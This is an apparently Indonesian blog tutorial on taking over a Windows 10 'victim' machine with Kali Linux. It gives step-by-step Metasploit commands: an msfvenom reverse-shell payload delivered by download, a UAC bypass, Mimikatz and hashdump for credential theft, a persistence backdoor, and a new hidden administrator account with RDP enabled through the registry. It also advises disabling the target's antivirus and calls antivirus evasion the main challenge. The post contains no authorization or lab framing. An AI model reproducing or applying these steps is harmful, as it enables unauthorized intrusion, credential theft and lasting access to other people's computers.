Cara Hack Windows 10 – Exploit menggunakan Kali Linux

Cara Hack Windows 10

Overview

Teknik eksploitasi mungkin dapat dikatakan teknik tertinggi dalam dunia hacking & security. Dengan menggunakan teknik ini, seorang attacker dapat menguasai seluruh sumber daya pada komputer korban. Attacker dapat menjelajahi seluruh isi di dalam komputer korban, seperti membuat file, menghapus file, memasang backdoor, mengambil screenshot pada webcam & layar dan masih banyak lagi.

Pada tutorial ini, akan dijelaskan teknik dasar yang dapat dijadikan sebuah gambaran dari eksploitasi . Agar lebih mudah pembaca dapat melakukan praktik menggunakan OS Kali Linux. Dapat juga menggunakan OS Linux lainnya yang penting untuk tools-tools yang dibutuhkan tersedia

Langkah Eksploitasi

Attacker: 10.211.55.14
Victim: 10.211.55.3

1 Membuat payload untuk dieksekusi oleh korban. File ini yang akan membuka akses di komputer korban.

$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.211.55.14 LPORT=4444 -o /root/Desktop/file.exe

2. Membungkus payload menggunakan zip. Sehingga nanti jika file ini di-donwload oleh korban melalui web browser misalkan Google Chrome, maka setidaknya file ini tidak dianggap file mencurigakan.

$ cd /root/Desktop/
$ zip -r file.zip file.exe

3. Masuk ke msfconsole dan membuka sesi eksploitasi.

$ msfconsole
	$ set payload
	$ use multi/handler
	$ set payload windows/meterpreter/reverse_tcp
	$ set LHOST 10.211.55.14
	$ set LPORT 4444
	$ run

4. Jalankan web server apacher2 pada Kali Linux. Hal ini bertujuan agar korban dapat melakukan download file yang telah di-generate sebelumnya. Dan copy file tersebut ke path web server.

$ service apache2 start
$ copy file.exe /var/www/html/files/

5. Akses web server dan lalukan download file dari komputer korban.

http://10.211.55.14/files

6. Eksekusi file tersebut. Jangan lupa untuk mematikan semua antivirus yang berjalan pada komputer korban.

7. Setelah dieksekusi, lihat pada sesi msfconsole sebelumnya pada poin ke-3. Maka sesi eksploitasi akan terbuka. Sekarang attacker memiliki akses ke komputer korban.

8. Lakukan perintah-perintah berikut untuk melakukan verifikasi pada komputer korban.

$ getuid
$ load mamikatz
$ getsystem

9. Pada perintah getsystem biasanya masih terdapat error. Akses masih ditolak dalam artian attacker belum sepenuhnya mengguasai komputer korban.

10. Jalankan perintah berikut agar sesi ekploitasi sebelumnya masuk ke dalam background.

$ background

11. Gunakan exploit/windows/local/bypassuac_comhijack untuk melakukan bypass pada UAC di komputer korban.

$ use exploit/windows/local/bypassuac_comhijack

12. Buka sesi kedua dan lakukan eksploitasi lagi.

$ set SESSION 2

$ set payload windows/meterpreter/reverse_tcp
$ set LHOST 10.211.55.14
$ set LPORT 4444
$ run

13. Maka attacker langsung dapat masuk ke komputer korban. Lakukan perintah-perintah berikut untuk mendapatkan informasi-informasi pada komputer korban.

$ sysinfo
$ getuid
$ getsystem
$ load mamikatz
$ hashdump

14. Jika ingin melakukan akses shell / command prompt pada komputer korban, lakukan perintah:

$ execute -f cmd.exe -i -H

Membuat Backdoor

Hal ini berfungsi agar ketika attacker ingin melakukan akses lagi di lain waktu, attacker dapat langsung masuk ke dalam sistem korban tanpa ada campur tangan dari korban.

1 Jalankan perintah di bawah ini.

$ run persistence -U -i 5 -p 4444 -r 10.211.55.14

2. Reboot komputer korban. Kemudian keluar dari sesi yang kedua tadi.

$ reboot
$ exit

3. Setelah komputer korban menyala lagi, buka sesi baru untuk melakukan tes apakah attacker dapat langsung mengakses komputer korban.

$ use exploit/multi/handler
$ set payload windows/meterpreter/reverse_tcp
$ set LHOST 10.211.55.14
$ set LPORT 4444
$ exploit
      $ sysinfo

Seharusnya korban tidak perlu melakukan eksekusi pada file.exe agar attacker bisa masuk ke sistem korban.

4. Membuat user di komputer korban agar dapat di-remote melalaui Remote Desktop Protocol.

$ execute -f cmd.exe -i -H
	$ net users
	$ net user zakky
	$ net user /add zakky2 passxxx
	$ net localgroup administrators zakky2 /add
	$ net localgroup "Remote Desktop Users" zakky /add
	$ net user zakky2

	//enable RDP
	$ reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

	//disable RDP
	$ reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 1 /f

5. Coba lakukan remote ke komputer korban menggunakan aplikasi Remmina di Linux.

Tantangan terbesar menurut penulis pada teknik eksploitasi adalah bagaimana agar payload yang kita buat untuk dieksekusi oleh korban tidak terdeteksi oleh antivirus. Sehingga proses eksploitasi dapat berjalan mulus tanpa ada kecurigaan dari korban. Semoga tulisan ini bermanfaat. Jika ada pertanyaan silahkan berikan komentar di bawah.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.